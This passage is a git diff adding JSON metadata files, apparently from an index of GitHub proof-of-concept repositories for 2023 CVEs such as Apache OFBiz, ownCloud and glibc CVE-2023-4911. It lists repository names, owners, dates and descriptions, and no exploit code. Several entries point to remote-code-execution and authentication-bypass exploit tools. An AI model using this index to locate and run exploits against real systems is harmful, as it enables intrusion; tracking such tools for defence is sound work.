+ "description": "PoC for CVE-2023-48858",
+ "fork": false,
+ "created_at": "2024-01-17T09:59:39Z",
+ "updated_at": "2024-01-17T09:59:40Z",
+ "pushed_at": "2024-01-17T10:16:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48866.json b/2023/CVE-2023-48866.json
new file mode 100644
index 0000000000..b56a296af2
--- /dev/null
+++ b/2023/CVE-2023-48866.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 725661760,
+ "name": "CVE-2023-48866",
+ "full_name": "nitipoom-jar\/CVE-2023-48866",
+ "owner": {
+ "login": "nitipoom-jar",
+ "id": 149907798,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4",
+ "html_url": "https:\/\/github.com\/nitipoom-jar"
+ },
+ "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48866",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-30T15:59:16Z",
+ "updated_at": "2023-11-30T16:01:02Z",
+ "pushed_at": "2023-11-30T16:00:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48974.json b/2023/CVE-2023-48974.json
new file mode 100644
index 0000000000..d26d14ab19
--- /dev/null
+++ b/2023/CVE-2023-48974.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 736802783,
+ "name": "CVE-2023-48974",
+ "full_name": "vinnie1717\/CVE-2023-48974",
+ "owner": {
+ "login": "vinnie1717",
+ "id": 28691535,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4",
+ "html_url": "https:\/\/github.com\/vinnie1717"
+ },
+ "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-48974",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-28T23:24:22Z",
+ "updated_at": "2023-12-28T23:24:22Z",
+ "pushed_at": "2023-12-28T23:35:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48981.json b/2023/CVE-2023-48981.json
new file mode 100644
index 0000000000..d15e3ef576
--- /dev/null
+++ b/2023/CVE-2023-48981.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737775658,
+ "name": "CVE-2023-48981",
+ "full_name": "tristao-marinho\/CVE-2023-48981",
+ "owner": {
+ "login": "tristao-marinho",
+ "id": 101610912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4",
+ "html_url": "https:\/\/github.com\/tristao-marinho"
+ },
+ "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48981",
+ "description": "POC CVE-2023-48981",
+ "fork": false,
+ "created_at": "2024-01-01T13:06:39Z",
+ "updated_at": "2024-01-01T13:06:40Z",
+ "pushed_at": "2024-01-01T13:18:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48982.json b/2023/CVE-2023-48982.json
new file mode 100644
index 0000000000..ee29e44855
--- /dev/null
+++ b/2023/CVE-2023-48982.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737777512,
+ "name": "CVE-2023-48982",
+ "full_name": "tristao-marinho\/CVE-2023-48982",
+ "owner": {
+ "login": "tristao-marinho",
+ "id": 101610912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4",
+ "html_url": "https:\/\/github.com\/tristao-marinho"
+ },
+ "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48982",
+ "description": "POC CVE-2023-48982",
+ "fork": false,
+ "created_at": "2024-01-01T13:14:49Z",
+ "updated_at": "2024-01-01T13:14:49Z",
+ "pushed_at": "2024-01-01T13:17:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-48983.json b/2023/CVE-2023-48983.json
new file mode 100644
index 0000000000..8bc2465891
--- /dev/null
+++ b/2023/CVE-2023-48983.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 737778720,
+ "name": "CVE-2023-48983",
+ "full_name": "tristao-marinho\/CVE-2023-48983",
+ "owner": {
+ "login": "tristao-marinho",
+ "id": 101610912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4",
+ "html_url": "https:\/\/github.com\/tristao-marinho"
+ },
+ "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48983",
+ "description": "POC CVE-2023-48983",
+ "fork": false,
+ "created_at": "2024-01-01T13:19:54Z",
+ "updated_at": "2024-01-02T12:18:35Z",
+ "pushed_at": "2024-01-01T13:23:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49000.json b/2023/CVE-2023-49000.json
new file mode 100644
index 0000000000..b528a112fe
--- /dev/null
+++ b/2023/CVE-2023-49000.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 719874792,
+ "name": "com.artis.browser",
+ "full_name": "actuator\/com.artis.browser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.artis.browser",
+ "description": "CVE-2023-49000",
+ "fork": false,
+ "created_at": "2023-11-17T04:43:47Z",
+ "updated_at": "2024-01-17T19:58:48Z",
+ "pushed_at": "2023-11-18T19:24:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-49000"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49001.json b/2023/CVE-2023-49001.json
new file mode 100644
index 0000000000..a20e89ffaf
--- /dev/null
+++ b/2023/CVE-2023-49001.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 719899410,
+ "name": "com.gurry.kvbrowser",
+ "full_name": "actuator\/com.gurry.kvbrowser",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.gurry.kvbrowser",
+ "description": "CVE-2023-49001",
+ "fork": false,
+ "created_at": "2023-11-17T06:17:44Z",
+ "updated_at": "2024-01-17T19:54:48Z",
+ "pushed_at": "2024-01-17T19:38:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-49001"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49002.json b/2023/CVE-2023-49002.json
new file mode 100644
index 0000000000..bde40bd54a
--- /dev/null
+++ b/2023/CVE-2023-49002.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 720804876,
+ "name": "com.sinous.voice.dialer",
+ "full_name": "actuator\/com.sinous.voice.dialer",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.sinous.voice.dialer",
+ "description": "CVE-2023-49002",
+ "fork": false,
+ "created_at": "2023-11-19T16:51:09Z",
+ "updated_at": "2024-01-17T19:55:42Z",
+ "pushed_at": "2023-11-28T08:15:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-49002"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49003.json b/2023/CVE-2023-49003.json
new file mode 100644
index 0000000000..e23bd9d15b
--- /dev/null
+++ b/2023/CVE-2023-49003.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 720827247,
+ "name": "com.simplemobiletools.dialer",
+ "full_name": "actuator\/com.simplemobiletools.dialer",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/com.simplemobiletools.dialer",
+ "description": "CVE-2023-49003",
+ "fork": false,
+ "created_at": "2023-11-19T18:08:23Z",
+ "updated_at": "2024-01-17T19:58:22Z",
+ "pushed_at": "2023-11-19T18:20:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-49003"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49038.json b/2023/CVE-2023-49038.json
new file mode 100644
index 0000000000..9ac9337d55
--- /dev/null
+++ b/2023/CVE-2023-49038.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731396286,
+ "name": "CVE-2023-49038",
+ "full_name": "christopher-pace\/CVE-2023-49038",
+ "owner": {
+ "login": "christopher-pace",
+ "id": 22531478,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4",
+ "html_url": "https:\/\/github.com\/christopher-pace"
+ },
+ "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-49038",
+ "description": "Command Injection in Ping Utility on Buffalo LS210D Version 1.78-0.03",
+ "fork": false,
+ "created_at": "2023-12-14T01:49:52Z",
+ "updated_at": "2024-01-07T03:38:02Z",
+ "pushed_at": "2024-01-07T03:37:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49052.json b/2023/CVE-2023-49052.json
new file mode 100644
index 0000000000..71e9ef5be6
--- /dev/null
+++ b/2023/CVE-2023-49052.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 724166656,
+ "name": "CVE-2023-49052",
+ "full_name": "Cyber-Wo0dy\/CVE-2023-49052",
+ "owner": {
+ "login": "Cyber-Wo0dy",
+ "id": 148460873,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4",
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy"
+ },
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-49052",
+ "description": "Microweber version 2.0.4 vulnerable to \"Uploading Malicious Files\" ",
+ "fork": false,
+ "created_at": "2023-11-27T14:29:32Z",
+ "updated_at": "2023-11-27T14:33:10Z",
+ "pushed_at": "2023-11-27T17:20:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49070.json b/2023/CVE-2023-49070.json
new file mode 100644
index 0000000000..3e1402aa3d
--- /dev/null
+++ b/2023/CVE-2023-49070.json
@@ -0,0 +1,193 @@
+[
+ {
+ "id": 731528272,
+ "name": "ofbiz-CVE-2023-49070-RCE-POC",
+ "full_name": "abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC",
+ "owner": {
+ "login": "abdoghazy2015",
+ "id": 64314534,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64314534?v=4",
+ "html_url": "https:\/\/github.com\/abdoghazy2015"
+ },
+ "html_url": "https:\/\/github.com\/abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-14T09:32:41Z",
+ "updated_at": "2024-06-20T08:51:28Z",
+ "pushed_at": "2023-12-15T06:29:09Z",
+ "stargazers_count": 56,
+ "watchers_count": 56,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 56,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 732816678,
+ "name": "CVE-2023-49070",
+ "full_name": "0xrobiul\/CVE-2023-49070",
+ "owner": {
+ "login": "0xrobiul",
+ "id": 100078094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4",
+ "html_url": "https:\/\/github.com\/0xrobiul"
+ },
+ "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2023-49070",
+ "description": "Exploit Of Pre-auth RCE in Apache Ofbiz!!",
+ "fork": false,
+ "created_at": "2023-12-17T22:56:10Z",
+ "updated_at": "2023-12-18T17:44:46Z",
+ "pushed_at": "2023-12-26T19:51:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache-ofbiz",
+ "cve",
+ "cve-2023-49070",
+ "ofbiz",
+ "pre-auth",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738951607,
+ "name": "OFBiz-Attack",
+ "full_name": "D0g3-8Bit\/OFBiz-Attack",
+ "owner": {
+ "login": "D0g3-8Bit",
+ "id": 150698913,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150698913?v=4",
+ "html_url": "https:\/\/github.com\/D0g3-8Bit"
+ },
+ "html_url": "https:\/\/github.com\/D0g3-8Bit\/OFBiz-Attack",
+ "description": "A Tool For CVE-2023-49070\/CVE-2023-51467 Attack",
+ "fork": false,
+ "created_at": "2024-01-04T12:31:49Z",
+ "updated_at": "2024-04-13T21:15:50Z",
+ "pushed_at": "2024-03-12T11:06:55Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache-ofbiz",
+ "cve-2023-49070",
+ "cve-2023-51467"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740289485,
+ "name": "Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz",
+ "full_name": "UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz",
+ "owner": {
+ "login": "UserConnecting",
+ "id": 97047842,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97047842?v=4",
+ "html_url": "https:\/\/github.com\/UserConnecting"
+ },
+ "html_url": "https:\/\/github.com\/UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz",
+ "description": "Authentication Bypass Vulnerability Apache OFBiz < 18.12.10.",
+ "fork": false,
+ "created_at": "2024-01-08T03:13:43Z",
+ "updated_at": "2024-04-13T04:19:46Z",
+ "pushed_at": "2024-01-08T07:03:01Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742169705,
+ "name": "CVE-2023-49070_CVE-2023-51467",
+ "full_name": "yukselberkay\/CVE-2023-49070_CVE-2023-51467",
+ "owner": {
+ "login": "yukselberkay",
+ "id": 22750024,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22750024?v=4",
+ "html_url": "https:\/\/github.com\/yukselberkay"
+ },
+ "html_url": "https:\/\/github.com\/yukselberkay\/CVE-2023-49070_CVE-2023-51467",
+ "description": "CVE-2023-49070 exploit and CVE-2023-49070 & CVE-2023-51467 vulnerability scanner",
+ "fork": false,
+ "created_at": "2024-01-11T22:35:57Z",
+ "updated_at": "2024-04-29T11:54:01Z",
+ "pushed_at": "2024-01-12T10:37:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744384595,
+ "name": "Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467",
+ "full_name": "Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467",
+ "description": "This exploit scans whether the provided target is vulnerable to CVE-2023-49070\/CVE-2023-51467 and also exploits it depending on the choice of the user.",
+ "fork": false,
+ "created_at": "2024-01-17T07:31:26Z",
+ "updated_at": "2024-01-17T07:45:27Z",
+ "pushed_at": "2024-01-25T08:21:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49103.json b/2023/CVE-2023-49103.json
new file mode 100644
index 0000000000..7a53117cfd
--- /dev/null
+++ b/2023/CVE-2023-49103.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 722207170,
+ "name": "CVE-2023-49103",
+ "full_name": "creacitysec\/CVE-2023-49103",
+ "owner": {
+ "login": "creacitysec",
+ "id": 151768625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4",
+ "html_url": "https:\/\/github.com\/creacitysec"
+ },
+ "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-49103",
+ "description": "PoC for the CVE-2023-49103",
+ "fork": false,
+ "created_at": "2023-11-22T17:00:23Z",
+ "updated_at": "2024-04-02T03:52:18Z",
+ "pushed_at": "2023-12-02T01:09:04Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 726423632,
+ "name": "CVE-2023-49103",
+ "full_name": "MixColumns\/CVE-2023-49103",
+ "owner": {
+ "login": "MixColumns",
+ "id": 134201910,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134201910?v=4",
+ "html_url": "https:\/\/github.com\/MixColumns"
+ },
+ "html_url": "https:\/\/github.com\/MixColumns\/CVE-2023-49103",
+ "description": "CVE-2023-49103 scanner for shodan.io downloaded json files",
+ "fork": false,
+ "created_at": "2023-12-02T11:03:19Z",
+ "updated_at": "2023-12-02T11:23:30Z",
+ "pushed_at": "2023-12-06T12:17:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 733384203,
+ "name": "OwnCloud-CVE-2023-49103",
+ "full_name": "merlin-ke\/OwnCloud-CVE-2023-49103",
+ "owner": {
+ "login": "merlin-ke",
+ "id": 55712262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55712262?v=4",
+ "html_url": "https:\/\/github.com\/merlin-ke"
+ },
+ "html_url": "https:\/\/github.com\/merlin-ke\/OwnCloud-CVE-2023-49103",
+ "description": "OwnCloud CVE-2023-49103",
+ "fork": false,
+ "created_at": "2023-12-19T07:56:18Z",
+ "updated_at": "2023-12-19T08:10:42Z",
+ "pushed_at": "2023-12-19T08:10:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-49105.json b/2023/CVE-2023-49105.json
new file mode 100644
index 0000000000..4c5d490576
--- /dev/null
+++ b/2023/CVE-2023-49105.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 727692725,
+ "name": "owncloud-exploits",
+ "full_name": "ambionics\/owncloud-exploits",
+ "owner": {
+ "login": "ambionics",
+ "id": 29630660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4",
+ "html_url": "https:\/\/github.com\/ambionics"
+ },
+ "html_url": "https:\/\/github.com\/ambionics\/owncloud-exploits",
+ "description": "ownCloud exploits for CVE-2023-49105",
+ "fork": false,
+ "created_at": "2023-12-05T11:35:12Z",
+ "updated_at": "2024-06-24T13:27:08Z",
+ "pushed_at": "2023-12-05T11:35:19Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4911.json b/2023/CVE-2023-4911.json
new file mode 100644
index 0000000000..75c6942e92
--- /dev/null
+++ b/2023/CVE-2023-4911.json
@@ -0,0 +1,486 @@
+[
+ {
+ "id": 700333818,
+ "name": "CVE-2023-4911",
+ "full_name": "Green-Avocado\/CVE-2023-4911",
+ "owner": {
+ "login": "Green-Avocado",
+ "id": 58372700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58372700?v=4",
+ "html_url": "https:\/\/github.com\/Green-Avocado"
+ },
+ "html_url": "https:\/\/github.com\/Green-Avocado\/CVE-2023-4911",
+ "description": "https:\/\/www.qualys.com\/2023\/10\/03\/cve-2023-4911\/looney-tunables-local-privilege-escalation-glibc-ld-so.txt",
+ "fork": false,
+ "created_at": "2023-10-04T11:58:58Z",
+ "updated_at": "2023-10-10T12:53:31Z",
+ "pushed_at": "2023-10-05T20:48:46Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 700394746,
+ "name": "CVE-2023-4911",
+ "full_name": "leesh3288\/CVE-2023-4911",
+ "owner": {
+ "login": "leesh3288",
+ "id": 17825906,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17825906?v=4",
+ "html_url": "https:\/\/github.com\/leesh3288"
+ },
+ "html_url": "https:\/\/github.com\/leesh3288\/CVE-2023-4911",
+ "description": "PoC for CVE-2023-4911",
+ "fork": false,
+ "created_at": "2023-10-04T14:12:16Z",
+ "updated_at": "2024-06-24T08:47:11Z",
+ "pushed_at": "2023-10-04T14:16:36Z",
+ "stargazers_count": 376,
+ "watchers_count": 376,
+ "has_discussions": false,
+ "forks_count": 59,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 59,
+ "watchers": 376,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 700404689,
+ "name": "CVE-2023-4911",
+ "full_name": "RickdeJager\/CVE-2023-4911",
+ "owner": {
+ "login": "RickdeJager",
+ "id": 29239050,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29239050?v=4",
+ "html_url": "https:\/\/github.com\/RickdeJager"
+ },
+ "html_url": "https:\/\/github.com\/RickdeJager\/CVE-2023-4911",
+ "description": "CVE-2023-4911 proof of concept",
+ "fork": false,
+ "created_at": "2023-10-04T14:32:49Z",
+ "updated_at": "2024-06-26T06:30:21Z",
+ "pushed_at": "2023-10-08T23:24:24Z",
+ "stargazers_count": 163,
+ "watchers_count": 163,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 163,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 701947383,
+ "name": "CVE-2023-4911",
+ "full_name": "xiaoQ1z\/CVE-2023-4911",
+ "owner": {
+ "login": "xiaoQ1z",
+ "id": 20059156,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20059156?v=4",
+ "html_url": "https:\/\/github.com\/xiaoQ1z"
+ },
+ "html_url": "https:\/\/github.com\/xiaoQ1z\/CVE-2023-4911",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-08T03:26:24Z",
+ "updated_at": "2023-10-08T03:30:00Z",
+ "pushed_at": "2023-10-08T03:28:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 703037275,
+ "name": "looney-tuneables",
+ "full_name": "silent6trinity\/looney-tuneables",
+ "owner": {
+ "login": "silent6trinity",
+ "id": 78173918,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4",
+ "html_url": "https:\/\/github.com\/silent6trinity"
+ },
+ "html_url": "https:\/\/github.com\/silent6trinity\/looney-tuneables",
+ "description": "CVE-2023-4911",
+ "fork": false,
+ "created_at": "2023-10-10T13:29:11Z",
+ "updated_at": "2023-10-10T13:30:33Z",
+ "pushed_at": "2023-10-10T13:32:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 703246649,
+ "name": "looney-tunables-CVE-2023-4911",
+ "full_name": "hadrian3689\/looney-tunables-CVE-2023-4911",
+ "owner": {
+ "login": "hadrian3689",
+ "id": 71423134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4",
+ "html_url": "https:\/\/github.com\/hadrian3689"
+ },
